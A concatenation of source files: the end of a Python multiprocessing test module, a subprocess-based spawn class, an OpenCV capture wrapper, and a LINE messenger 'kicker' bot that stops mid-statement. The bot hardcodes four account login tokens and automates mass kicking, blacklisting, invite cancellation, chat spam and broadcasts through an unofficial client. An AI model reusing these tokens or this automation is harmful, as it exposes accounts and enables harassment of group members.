assert list(obj.items()) == [('foo', 5)]
assert list(obj.keys()) == ['foo']
assert list(obj.values()) == [5]
assert obj.copy() == {'foo': 5}
assert obj.popitem() == ('foo', 5)
def test_dict(self):
o = self.manager.dict()
o['foo'] = 5
self.run_worker(self._test_dict, o)
assert not o
self.assertEqual(len(o), 0)
@classmethod
def _test_value(cls, obj):
assert obj.value == 1
assert obj.get() == 1
obj.set(2)
def test_value(self):
o = self.manager.Value('i', 1)
self.run_worker(self._test_value, o)
self.assertEqual(o.value, 2)
self.assertEqual(o.get(), 2)
@classmethod
def _test_array(cls, obj):
assert obj[0] == 0
assert obj[1] == 1
assert len(obj) == 2
assert list(obj) == [0, 1]
def test_array(self):
o = self.manager.Array('i', [0, 1])
self.run_worker(self._test_array, o)
@classmethod
def _test_namespace(cls, obj):
assert obj.x == 0
assert obj.y == 1
def test_namespace(self):
o = self.manager.Namespace()
o.x = 0
o.y = 1
self.run_worker(self._test_namespace, o)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
# Just make sure names in blacklist are excluded
support.check__all__(self, multiprocessing, extra=multiprocessing.__all__,
blacklist=['SUBDEBUG', 'SUBWARNING'])
#
# Mixins
#
class BaseMixin(object):
@classmethod
def setUpClass(cls):
cls.dangling = (multiprocessing.process._dangling.copy(),
threading._dangling.copy())
@classmethod
def tearDownClass(cls):
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
processes = set(multiprocessing.process._dangling) - set(cls.dangling[0])
if processes:
test.support.environment_altered = True
print('Warning -- Dangling processes: %s' % processes,
file=sys.stderr)
processes = None
threads = set(threading._dangling) - set(cls.dangling[1])
if threads:
test.support.environment_altered = True
print('Warning -- Dangling threads: %s' % threads,
file=sys.stderr)
threads = None
class ProcessesMixin(BaseMixin):
TYPE = 'processes'
Process = multiprocessing.Process
connection = multiprocessing.connection
current_process = staticmethod(multiprocessing.current_process)
active_children = staticmethod(multiprocessing.active_children)
Pool = staticmethod(multiprocessing.Pool)
Pipe = staticmethod(multiprocessing.Pipe)
Queue = staticmethod(multiprocessing.Queue)
JoinableQueue = staticmethod(multiprocessing.JoinableQueue)
Lock = staticmethod(multiprocessing.Lock)
RLock = staticmethod(multiprocessing.RLock)
Semaphore = staticmethod(multiprocessing.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.BoundedSemaphore)
Condition = staticmethod(multiprocessing.Condition)
Event = staticmethod(multiprocessing.Event)
Barrier = staticmethod(multiprocessing.Barrier)
Value = staticmethod(multiprocessing.Value)
Array = staticmethod(multiprocessing.Array)
RawValue = staticmethod(multiprocessing.RawValue)
RawArray = staticmethod(multiprocessing.RawArray)
class ManagerMixin(BaseMixin):
TYPE = 'manager'
Process = multiprocessing.Process
Queue = property(operator.attrgetter('manager.Queue'))
JoinableQueue = property(operator.attrgetter('manager.JoinableQueue'))
Lock = property(operator.attrgetter('manager.Lock'))
RLock = property(operator.attrgetter('manager.RLock'))
Semaphore = property(operator.attrgetter('manager.Semaphore'))
BoundedSemaphore = property(operator.attrgetter('manager.BoundedSemaphore'))
Condition = property(operator.attrgetter('manager.Condition'))
Event = property(operator.attrgetter('manager.Event'))
Barrier = property(operator.attrgetter('manager.Barrier'))
Value = property(operator.attrgetter('manager.Value'))
Array = property(operator.attrgetter('manager.Array'))
list = property(operator.attrgetter('manager.list'))
dict = property(operator.attrgetter('manager.dict'))
Namespace = property(operator.attrgetter('manager.Namespace'))
@classmethod
def Pool(cls, *args, **kwds):
return cls.manager.Pool(*args, **kwds)
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.manager = multiprocessing.Manager()
@classmethod
def tearDownClass(cls):
# only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
print("Warning -- multiprocessing.Manager still has %s active "
"children after %s seconds"
% (multiprocessing.active_children(), dt),
file=sys.stderr)
break
gc.collect() # do garbage collection
if cls.manager._number_of_objects() != 0:
# This is not really an error since some tests do not
# ensure that all processes which hold a reference to a
# managed object have been joined.
test.support.environment_altered = True
print('Warning -- Shared objects which still exist at manager '
'shutdown:')
print(cls.manager._debug_info())
cls.manager.shutdown()
cls.manager.join()
cls.manager = None
super().tearDownClass()
class ThreadsMixin(BaseMixin):
TYPE = 'threads'
Process = multiprocessing.dummy.Process
connection = multiprocessing.dummy.connection
current_process = staticmethod(multiprocessing.dummy.current_process)
active_children = staticmethod(multiprocessing.dummy.active_children)
Pool = staticmethod(multiprocessing.dummy.Pool)
Pipe = staticmethod(multiprocessing.dummy.Pipe)
Queue = staticmethod(multiprocessing.dummy.Queue)
JoinableQueue = staticmethod(multiprocessing.dummy.JoinableQueue)
Lock = staticmethod(multiprocessing.dummy.Lock)
RLock = staticmethod(multiprocessing.dummy.RLock)
Semaphore = staticmethod(multiprocessing.dummy.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.dummy.BoundedSemaphore)
Condition = staticmethod(multiprocessing.dummy.Condition)
Event = staticmethod(multiprocessing.dummy.Event)
Barrier = staticmethod(multiprocessing.dummy.Barrier)
Value = staticmethod(multiprocessing.dummy.Value)
Array = staticmethod(multiprocessing.dummy.Array)
#
# Functions used to create test cases from the base ones in this module
#
def install_tests_in_module_dict(remote_globs, start_method):
__module__ = remote_globs['__name__']
local_globs = globals()
ALL_TYPES = {'processes', 'threads', 'manager'}
for name, base in local_globs.items():
if not isinstance(base, type):
continue
if issubclass(base, BaseTestCase):
if base is BaseTestCase:
continue
assert set(base.ALLOWED_TYPES) <= ALL_TYPES, base.ALLOWED_TYPES
for type_ in base.ALLOWED_TYPES:
newname = 'With' + type_.capitalize() + name[1:]
Mixin = local_globs[type_.capitalize() + 'Mixin']
class Temp(base, Mixin, unittest.TestCase):
pass
Temp.__name__ = Temp.__qualname__ = newname
Temp.__module__ = __module__
remote_globs[newname] = Temp
elif issubclass(base, unittest.TestCase):
class Temp(base, object):
pass
Temp.__name__ = Temp.__qualname__ = name
Temp.__module__ = __module__
remote_globs[name] = Temp
dangling = [None, None]
old_start_method = [None]
def setUpModule():
multiprocessing.set_forkserver_preload(PRELOAD)
multiprocessing.process._cleanup()
dangling[0] = multiprocessing.process._dangling.copy()
dangling[1] = threading._dangling.copy()
old_start_method[0] = multiprocessing.get_start_method(allow_none=True)
try:
multiprocessing.set_start_method(start_method, force=True)
except ValueError:
raise unittest.SkipTest(start_method +
' start method not supported')
if sys.platform.startswith("linux"):
try:
lock = multiprocessing.RLock()
except OSError:
raise unittest.SkipTest("OSError raises on RLock creation, "
"see issue 3111!")
check_enough_semaphores()
util.get_temp_dir() # creates temp directory
multiprocessing.get_logger().setLevel(LOG_LEVEL)
def tearDownModule():
need_sleep = False
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
multiprocessing.set_start_method(old_start_method[0], force=True)
# pause a bit so we don't get warning about dangling threads/processes
processes = set(multiprocessing.process._dangling) - set(dangling[0])
if processes:
need_sleep = True
test.support.environment_altered = True
print('Warning -- Dangling processes: %s' % processes,
file=sys.stderr)
processes = None
threads = set(threading._dangling) - set(dangling[1])
if threads:
need_sleep = True
test.support.environment_altered = True
print('Warning -- Dangling threads: %s' % threads,
file=sys.stderr)
threads = None
# Sleep 500 ms to give time to child processes to complete.
if need_sleep:
time.sleep(0.5)
multiprocessing.process._cleanup()
test.support.gc_collect()
remote_globs['setUpModule'] = setUpModule
remote_globs['tearDownModule'] = tearDownModule
|
popen_spawn.py
|
"""Provides an interface like pexpect.spawn interface using subprocess.Popen
"""
import os
import threading
import subprocess
import sys
import time
import signal
import shlex
try:
from queue import Queue, Empty # Python 3
except ImportError:
from Queue import Queue, Empty # Python 2
from .spawnbase import SpawnBase, PY3
from .exceptions import EOF
from .utils import string_types
class PopenSpawn(SpawnBase):
if PY3:
crlf = '\n'.encode('ascii')
else:
crlf = '\n'
def __init__(self, cmd, timeout=30, maxread=2000, searchwindowsize=None,
logfile=None, cwd=None, env=None, encoding=None,
codec_errors='strict'):
super(PopenSpawn, self).__init__(timeout=timeout, maxread=maxread,
searchwindowsize=searchwindowsize, logfile=logfile,
encoding=encoding, codec_errors=codec_errors)
kwargs = dict(bufsize=0, stdin=subprocess.PIPE,
stderr=subprocess.STDOUT, stdout=subprocess.PIPE,
cwd=cwd, env=env)
if sys.platform == 'win32':
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
kwargs['startupinfo'] = startupinfo
kwargs['creationflags'] = subprocess.CREATE_NEW_PROCESS_GROUP
if isinstance(cmd, string_types) and sys.platform != 'win32':
cmd = shlex.split(cmd, posix=os.name == 'posix')
self.proc = subprocess.Popen(cmd, **kwargs)
self.pid = self.proc.pid
self.closed = False
self._buf = self.string_type()
self._read_queue = Queue()
self._read_thread = threading.Thread(target=self._read_incoming)
self._read_thread.setDaemon(True)
self._read_thread.start()
_read_reached_eof = False
def read_nonblocking(self, size, timeout):
buf = self._buf
if self._read_reached_eof:
# We have already finished reading. Use up any buffered data,
# then raise EOF
if buf:
self._buf = buf[size:]
return buf[:size]
else:
self.flag_eof = True
raise EOF('End Of File (EOF).')
if timeout == -1:
timeout = self.timeout
elif timeout is None:
timeout = 1e6
t0 = time.time()
while (time.time() - t0) < timeout and size and len(buf) < size:
try:
incoming = self._read_queue.get_nowait()
except Empty:
break
else:
if incoming is None:
self._read_reached_eof = True
break
buf += self._decoder.decode(incoming, final=False)
r, self._buf = buf[:size], buf[size:]
self._log(r, 'read')
return r
def _read_incoming(self):
"""Run in a thread to move output from a pipe to a queue."""
fileno = self.proc.stdout.fileno()
while 1:
buf = b''
try:
buf = os.read(fileno, 1024)
except OSError as e:
self._log(e, 'read')
if not buf:
# This indicates we have reached EOF
self._read_queue.put(None)
return
self._read_queue.put(buf)
def write(self, s):
'''This is similar to send() except that there is no return value.
'''
self.send(s)
def writelines(self, sequence):
'''This calls write() for each element in the sequence.
The sequence can be any iterable object producing strings, typically a
list of strings. This does not add line separators. There is no return
value.
'''
for s in sequence:
self.send(s)
def send(self, s):
'''Send data to the subprocess' stdin.
Returns the number of bytes written.
'''
s = self._coerce_send_string(s)
self._log(s, 'send')
b = self._encoder.encode(s, final=False)
if PY3:
return self.proc.stdin.write(b)
else:
# On Python 2, .write() returns None, so we return the length of
# bytes written ourselves. This assumes they all got written.
self.proc.stdin.write(b)
return len(b)
def sendline(self, s=''):
'''Wraps send(), sending string ``s`` to child process, with os.linesep
automatically appended. Returns number of bytes written. '''
n = self.send(s)
return n + self.send(self.linesep)
def wait(self):
'''Wait for the subprocess to finish.
Returns the exit code.
'''
status = self.proc.wait()
if status >= 0:
self.exitstatus = status
self.signalstatus = None
else:
self.exitstatus = None
self.signalstatus = -status
self.terminated = True
return status
def kill(self, sig):
'''Sends a Unix signal to the subprocess.
Use constants from the :mod:`signal` module to specify which signal.
'''
if sys.platform == 'win32':
if sig in [signal.SIGINT, signal.CTRL_C_EVENT]:
sig = signal.CTRL_C_EVENT
elif sig in [signal.SIGBREAK, signal.CTRL_BREAK_EVENT]:
sig = signal.CTRL_BREAK_EVENT
else:
sig = signal.SIGTERM
os.kill(self.proc.pid, sig)
def sendeof(self):
'''Closes the stdin pipe from the writing end.'''
self.proc.stdin.close()
|
videoCapture.py
|
import cv2
import queue
import threading
class VideoCapture(object):
def __init__(self, video_stream):
self.cap = cv2.VideoCapture(video_stream)
self.q = queue.Queue()
self.video_stream = video_stream
self.t = threading.Thread(target=self._reader)
self.t.daemon = True
self.t.start()
def _reader(self):
while True:
ret, frame = self.cap.read()
if not ret:
self.cap.set(cv2.CAP_PROP_POS_FRAMES, 0)
continue
if not self.q.empty():
try:
self.q.get_nowait()
except:
pass
self.q.put(frame)
def read(self):
return self.q.get()
def isOpened(self):
return self.cap.isOpened()
def release(self):
return self.cap.release()
def restart(self):
self.t.killed = True
self.__init__(self.video_stream)
|
Line-dul.py
|
# -*- coding: utf-8 -*-
import LINETCR
from LINETCR.lib.curve.ttypes import *
from LINETCR import server
from datetime import datetime
import time,random,sys,json,codecs,threading,glob,requests,urllib
import re,string,os,shutil,urllib2,urllib3,subprocess
from urllib import urlopen
import requests,tempfile
#kk = LINETCR.LINE()
#kk.login(qr=True)
#kk.loginResult()
cl = LINETCR.LINE()
#cl.login(qr=True)
cl.login(token="EnliZjabbWniaqdsPTt5.nqZhqiZgZilGvU4eyth5jq.4DldEayovtSgtlpllfy/HiizJIJKmojjW1RC3eFY7RE=")
cl.loginResult()
ki = LINETCR.LINE()
#ki.login(qr=True)
ki.login(token="EnkbSAUsfLrAeepJVS87.7aNdCEtbMUaAO9Hiv0qoTW.m260dnSrLLw2kC3NImxtk7zAMmMoMD+I78Nx/PNJjEs=")
ki.loginResult()
kk = LINETCR.LINE()
#kk.login(qr=True)
kk.login(token="EnyTpTVYCSl7Bk9Getxc.SJRuNecAXNC8sHurfor2ha.FvjQmaYhw1tQ7xg/BmYpNBh+d6/GM98WAGGHeBwJL24=")
kk.loginResult()
kc = LINETCR.LINE()
#kc.login(qr=True)
kc.login(token="EnqwhiNcEYLaYRH56U9d.6WqeC+1pukOllkvQ7Oglhq.zSdH/YLAkAXkOlHEOkvuQOIX0b11gNPLu1LAlEPw8Ik=")
kc.loginResult()
cl
print "login success"
reload(sys)
sys.setdefaultencoding('utf-8')
helpMessage =""" - DULKOL BOT TEAM -
General command :
Me = Cek akun sendiri
My mid = Cek akun Mid
Mid @ = Cek mid via tag
Bot? = Cek akun Bot
Ginfo = Group info
Id Group = Melihat id grup
Group pict = Melihat pict grup
Speedbot = Cek kecepatan bot
Up = Fungsi spam chat
Tagall = Mention semua user
Cek = Membuat set point
Sider = Melihat sider dibawah read point
Apakah ... = Menanyakan jawaban ya atau tidak
Creator = Melihat kontak pembuat bot
private command :
Set group = Melihat private menu"""
Setgroup =""" Private Menu red check mark
[Protect Group]
-- Gr on/off
[Mid Via Contact]
-- Contact on/off
[Cancel All Invited]
-- Cancl on/off
[No Joinned]
-- Joinn on/off
red arrow right Command Private
[Set View] = Melihat proteksi bot
[Get ready] = Cek respon bot
[Gn namagroup] = Ganti nama grup
[Open url] = Membuka url grup
[Gurl] = Membuka dan mengirim url grup
[Close url] = Menutup url grup
[Cancel] = Cancel user masuk grup
[Staff add @] = Menambah user admin
[Staff remove @] = Menghapus user dari admin
[Stafflist] = Melihat daftar admin
[Ban @] = Ban target with mention
[Ban] = Ban target with send contact
[Unban @] = Unban target with mention
[Unban] = Unban target with send contact
[Banlist] = Melihat daftar akun ter-banned
[Kill @] = Kick target banned
[Nk @] = Kick target user
[List group] = Melihat daftar grup pada bot
[Group id] = Melihat daftar id grup pada bot
[Invite mid] = Invite via mid
[inv: (gid)] = Invite admin ke group id yang dituju
[Kick mid] = Kick via mid
[Ard Squad join] = Invite semua bot
[Bye bots] = Mengeluarkan semua bots assist
[Bye Ard] = Mengeluarkan bot utama
[Ard out] = Mengeluarkan bot utama dari semua grup
[Bc ...] = Untuk broadcast ke semua grup
[Kernel] = Melihat kernel bot"""
KAC=[cl,ki,kk,kc]
DEF=[ki,kk,kc]
mid = cl.getProfile().mid
["u350cc7408cc6cc82e056ee046131f925"]
Amid = ki.getProfile().mid
["uec09c371e4c19ae01aa3d84857440eb7"]
Bmid = kk.getProfile().mid
["ub23ad49c409ac6773c4a151114e4761c"]
Cmid = kc.getProfile().mid
["ueb040473fd4f50aa0b2ca56aee818b1d"]
Bots=[mid,Amid,Bmid,Cmid,"u350cc7408cc6cc82e056ee046131f925"]
admin=["u350cc7408cc6cc82e056ee046131f925"]
admsa=["u350cc7408cc6cc82e056ee046131f925"]
wait = {
'contact':False,
'autoJoin':True,
'autoCancel':{"on":True,"members":1},
'leaveRoom':True,
'timeline':False,
'autoAdd':True,
'message':"Thanks for add me",
"lang":"JP",
"comment":"Thanks for add me",
"commentOn":True,
"commentBlack":{},
"wblack":False,
"dblack":False,
"clock":False,
"cName":"✴✴(iɥpɐƃuɐqɐq)",
"cName":"bots",
"blacklist":{},
"wblacklist":False,
"dblacklist":False,
"Protectgr":True,
"Protectjoin":False,
"Protectcancl":False,
"protectionOn":True,
"atjointicket":True,
}
wait2 = {
'readPoint':{},
'readMember':{},
'setTime':{},
'ROM':{}
}
setTime = {}
setTime = wait2['setTime']
def sendMessage(to, text, contentMetadata={}, contentType=0):
mes = Message()
mes.to, mes.from_ = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
def NOTIFIED_READ_MESSAGE(op):
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n・" + Name
wait2['ROM'][op.param1][op.param2] = "\n・" + Name
else:
pass
except:
pass
def RECEIVE_MESSAGE(op):
msg = op.message
try:
if msg.contentType == 0:
try:
if msg.to in wait['readPoint']:
if msg.from_ in wait["ROM"][msg.to]:
del wait["ROM"][msg.to][msg.from_]
else:
pass
except:
pass
else:
pass
except KeyboardInterrupt:
sys.exit(0)
except Exception as error:
print error
print ("\n\nRECEIVE_MESSAGE\n\n")
return
def bot(op):
try:
if op.type == 0:
return
if op.type == 5:
if wait["autoAdd"] == True:
cl.findAndAddContactsByMid(op.param1)
if (wait["message"] in [""," ","\n",None]):
pass
else:
cl.sendText(op.param1,str(wait["message"]))
if op.type == 32:
if wait["Protectgr"] == True:
if op.param2 not in Bots + admin:
ki.findAndAddContactByMid(op.param3)
ki.inviteIntoGroup(op.param1,[op.param3])
ki.kickoutFromGroup(op.param1,[op.param2])
else:
pass
#------Protect Group Kick start------#
if op.type == 11:
if wait["Protectgr"] == True:
if ki.getGroup(op.param1).preventJoinByTicket == False:
if op.param2 in Bots:
pass
if op.param2 in admin:
pass
else:
ki.kickoutFromGroup(op.param1,[op.param2])
wait["blacklist"][op.param2] = True
ki.reissueGroupTicket(op.param1)
X = ki.getGroup(op.param1)
X.preventJoinByTicket = True
ki.updateGroup(X)
print "Url Opened, Autokick on"
else:
print "random group update"
else:
pass
#------Protect Group Kick finish-----#
#------Cancel Invite User start------#
#------Cancel Invite User Finish------#
if op.type == 13:
if wait["Protectcancl"] == True:
try:
X = ki.getGroup(op.param1)
gInviMids = [contact.mid for contact in X.invitee]
ki.cancelGroupInvitation(op.param1, gInviMids)
print gInviMids + "invite canceled"
except:
try:
print "Retry canceling invitation"
X = ki.getGroup(op.param1)
gInviMids = [contact.mid for contact in X.invitee]
ki.cancelGroupInvitation(op.param1, gInviMids)
print gInviMids + "invite canceled"
except:
print "Bot can't cancel the invitation"
if op.type == 13:
if mid in op.param3:
if wait["autoJoin"] == True:
cl.acceptGroupInvitation(op.param1)
print "BOT 1 Joined"
else:
print "autoJoin is Off"
else:
pass
if op.type == 13:
if op.param3 in mid:
if op.param2 in Amid:
G = Amid.getGroup(op.param1)
G.preventJoinByTicket = False
Amid.updateGroup(G)
Ticket = Amid.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
Amid.updateGroup(G)
Ticket = Amid.reissueGroupTicket(op.param1)
if op.param3 in Amid:
if op.param2 in mid:
X = cl.getGroup(op.param1)
X.preventJoinByTicket = False
cl.updateGroup(X)
Ti = cl.reissueGroupTicket(op.param1)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
ki.updateGroup(X)
Ti = ki.reissueGroupTicket(op.param1)
if op.param3 in Bmid:
if op.param2 in Amid:
X = ki.getGroup(op.param1)
X.preventJoinByTicket = False
ki.updateGroup(X)
Ti = ki.reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
kk.updateGroup(X)
Ti = kk.reissueGroupTicket(op.param1)
if op.param3 in Cmid:
if op.param2 in Bmid:
X = kk.getGroup(op.param1)
X.preventJoinByTicket = False
kk.updateGroup(X)
Ti = kk.reissueGroupTicket(op.param1)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
kc.updateGroup(X)
Ti = kc.reissueGroupTicket(op.param1)
if op.param3 in Dmid:
if op.param2 in Cmid:
X = kc.getGroup(op.param1)
X.preventJoinByTicket = False
kc.updateGroup(X)
Ti = kc.reissueGroupTicket(op.param1)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
ks.updateGroup(X)
Ti = ks.reissueGroupTicket(op.param1)
if op.param3 in Emid:
if op.param2 in Dmid:
X = ks.getGroup(op.param1)
X.preventJoinByTicket = False
ks.updateGroup(X)
Ti = ks.reissueGroupTicket(op.param1)
ka.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
ka.updateGroup(X)
Ti = ka.reissueGroupTicket(op.param1)
if op.param3 in Fmid:
if op.param2 in Emid:
X = ka.getGroup(op.param1)
X.preventJoinByTicket = False
ka.updateGroup(X)
Ti = ka.reissueGroupTicket(op.param1)
kb.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
kb.updateGroup(X)
Ti = kb.reissueGroupTicket(op.param1)
if op.param3 in Gmid:
if op.param2 in Fmid:
X = kb.getGroup(op.param1)
X.preventJoinByTicket = False
kb.updateGroup(X)
Ti = kb.reissueGroupTicket(op.param1)
ko.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
ko.updateGroup(X)
Ti = ko.reissueGroupTicket(op.param1)
if op.param3 in Hmid:
if op.param2 in Gmid:
X = ko.getGroup(op.param1)
X.preventJoinByTicket = False
ko.updateGroup(X)
Ti = ko.reissueGroupTicket(op.param1)
ke.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
ke.updateGroup(X)
Ti = ke.reissueGroupTicket(op.param1)
if op.param3 in Imid:
if op.param2 in mid:
X = cl.getGroup(op.param1)
X.preventJoinByTicket = False
cl.updateGroup(X)
Ti = cl.reissueGroupTicket(op.param1)
ku.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
cl.updateGroup(X)
Ti = cl.reissueGroupTicket(op.param1)
if op.type == 15:
group = cl.getGroup(op.param1)
cb = Message()
cb.to = op.param1
cb.text = "Good bye " + cl.getContact(op.param2).displayName
cl.sendMessage(cb)
print op.param2 + "has left the group"
#------Joined User Kick start------#
if op.type == 17:
if op.param2 in wait["blacklist"]:
try:
ki.kickoutFromGroup(op.param1, op.param2)
except:
random.choice(KAC).kickoutFromGroup(op.param1, op.param2)
if op.type == 17:
if wait["Protectjoin"] == True:
if op.param2 not in Bots:
random.choice(DEF).kickoutFromGroup(op.param1,[op.param2])
#------Joined User Kick start------#
if op.type == 17:
group = cl.getGroup(op.param1)
cb = Message()
cb.to = op.param1
cb.text = "Hi " + cl.getContact(op.param2).displayName + ", welcome to " + group.name
cl.sendMessage(cb)
if op.type == 19:
print "someone was kicked"
if op.param3 in admin:
print "Admin has been kicked"
if op.param2 in Bots:
pass
if op.param2 in admsa:
pass
else:
cl.kickoutFromGroup(op.param1,[op.param2])
wait["blacklist"][op.param2] = True
print "kicker kicked"
try:
cl.inviteIntoGroup(op.param1,admin)
except:
cl.inviteIntoGroup(op.param1,admin)
print "Admin invited back"
if mid in op.param3:
print "BOT1 has been kicked"
if op.param2 in Bots:
pass
if op.param2 in admin:
pass
else:
ki.kickoutFromGroup(op.param1,[op.param2])
wait["blacklist"][op.param2] = True
print "kicker kicked"
G = random.choice(KAC).getGroup(op.param1)
G.preventJoinByTicket = False
ki.updateGroup(G)
Ti = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
X = ki.getGroup(op.param1)
X.preventJoinByTicket = True
ki.updateGroup(X)
Ti = ki.reissueGroupTicket(op.param1)
print "BOT1 Joined"
if Amid in op.param3:
print "BOT2 has been kicked"
if op.param2 in Bots:
pass
if op.param2 in admin:
pass
else:
cl.kickoutFromGroup(op.param1,[op.param2])
wait["blacklist"][op.param2] = True
print "kicker kicked"
G = random.choice(KAC).getGroup(op.param1)
G.preventJoinByTicket = False
cl.updateGroup(G)
Ti = cl.reissueGroupTicket(op.param1)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
X = cl.getGroup(op.param1)
X.preventJoinByTicket = True
cl.updateGroup(X)
Ti = cl.reissueGroupTicket(op.param1)
print "BOT2 Joined"
if Bmid in op.param3:
print "BOT3 has been kicked"
if op.param2 in Bots:
pass
if op.param2 in admin:
pass
else:
cl.kickoutFromGroup(op.param1,[op.param2])
wait["blacklist"][op.param2] = True
print "kicker kicked"
G = random.choice(KAC).getGroup(op.param1)
G.preventJoinByTicket = False
cl.updateGroup(G)
Ti = cl.reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
X = cl.getGroup(op.param1)
X.preventJoinByTicket = True
cl.updateGroup(X)
Ti = cl.reissueGroupTicket(op.param1)
print "BOT3 Joined"
if Cmid in op.param3:
print "BOT4 has been kicked"
if op.param2 in Bots:
pass
if op.param2 in admin:
pass
else:
cl.kickoutFromGroup(op.param1,[op.param2])
wait["blacklist"][op.param2] = True
print "kicker kicked"
G = random.choice(KAC).getGroup(op.param1)
G.preventJoinByTicket = False
cl.updateGroup(G)
Ti = cl.reissueGroupTicket(op.param1)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
X = cl.getGroup(op.param1)
X.preventJoinByTicket = True
cl.updateGroup(X)
Ti = cl.reissueGroupTicket(op.param1)
print "BOT4 Joined"
else:
if wait["Protectgr"] == True:
if op.param2 in Bots + admin:
pass
else:
ki.kickoutFromGroup(op.param1,[op.param2])
kk.kickoutFromGroup(op.param1,[op.param2])
kc.kickoutFromGroup(op.param1,[op.param2])
wait["blacklist"][op.param2] = True
print "autokick executed"
if op.type == 22:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 24:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 25:
msg = op.message
if msg.toType == 0:
msg.to = msg.from_
if msg.from_ == "u350cc7408cc6cc82e056ee046131f925":
if "join:" in msg.text:
list_ = msg.text.split(":")
try:
cl.acceptGroupInvitationByTicket(list_[1],list_[2])
G = cl.getGroup(list_[1])
G.preventJoinByTicket = True
cl.updateGroup(G)
except:
cl.sendText(msg.to,"error")
if op.type == 26:
msg = op.message
if msg.toType == 1:
if wait["leaveRoom"] == True:
cl.leaveRoom(msg.to)
if msg.contentType == 16:
url = msg.contentMetadata("line://home/post?userMid="+mid+"&postId="+"new_post")
cl.like(url[25:58], url[66:], likeType=1001)
if op.type == 25:
msg = op.message
if msg.contentType == 13:
if wait["wblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
cl.sendText(msg.to,"Already in blacklist")
wait["wblack"] = False
else:
wait["commentBlack"][msg.contentMetadata["mid"]] = True
wait["wblack"] = False
cl.sendText(msg.to,"Decided not to comment.")
elif wait["dblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
del wait["commentBlack"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"Removed from blacklist.")
wait["dblack"] = False
else:
wait["dblack"] = False
cl.sendText(msg.to,"There's no target in blacklist.")
elif wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
cl.sendText(msg.to,"Already in blacklist")
wait["wblacklist"] = False
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = False
cl.sendText(msg.to,"Added to blacklist.")
elif wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"Removed from blacklist.")
wait["dblacklist"] = False
else:
wait["dblacklist"] = False
cl.sendText(msg.to,"There's no target in blacklist.")
elif wait["contact"] == True:
msg.contentType = 0
cl.sendText(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"display name : " + msg.contentMetadata["displayName"] + "\n\nmid : " + msg.contentMetadata["mid"] + "\n\nstatus message : " + contact.statusMessage + "\n\ndisplay picture : http://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n\ncover URL : " + str(cu))
else:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"display name : " + msg.contentMetadata["displayName"] + "\n\nmid : " + msg.contentMetadata["mid"] + "\n\nstatus message : " + contact.statusMessage + "\n\ndisplay picture : http://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n\ncover URL : " + str(cu))
elif msg.contentType == 16:
if wait["timeline"] == True:
msg.contentType = 0
msg.text = "post URL\n" + msg.contentMetadata["postEndUrl"]
cl.sendText(msg.to,msg.text)
elif msg.text is None:
return
elif msg.text.lower() == 'help':
if wait["lang"] == "JP":
cl.sendText(msg.to,helpMessage)
else:
cl.sendText(msg.to,helpt)
elif msg.text.lower() == 'set group':
if msg.from_ in admin:
if wait["lang"] == "JP":
cl.sendText(msg.to,Setgroup)
else:
cl.sendText(msg.to,Sett)
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
elif ("Gn " in msg.text):
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Gn ","")
cl.updateGroup(X)
else:
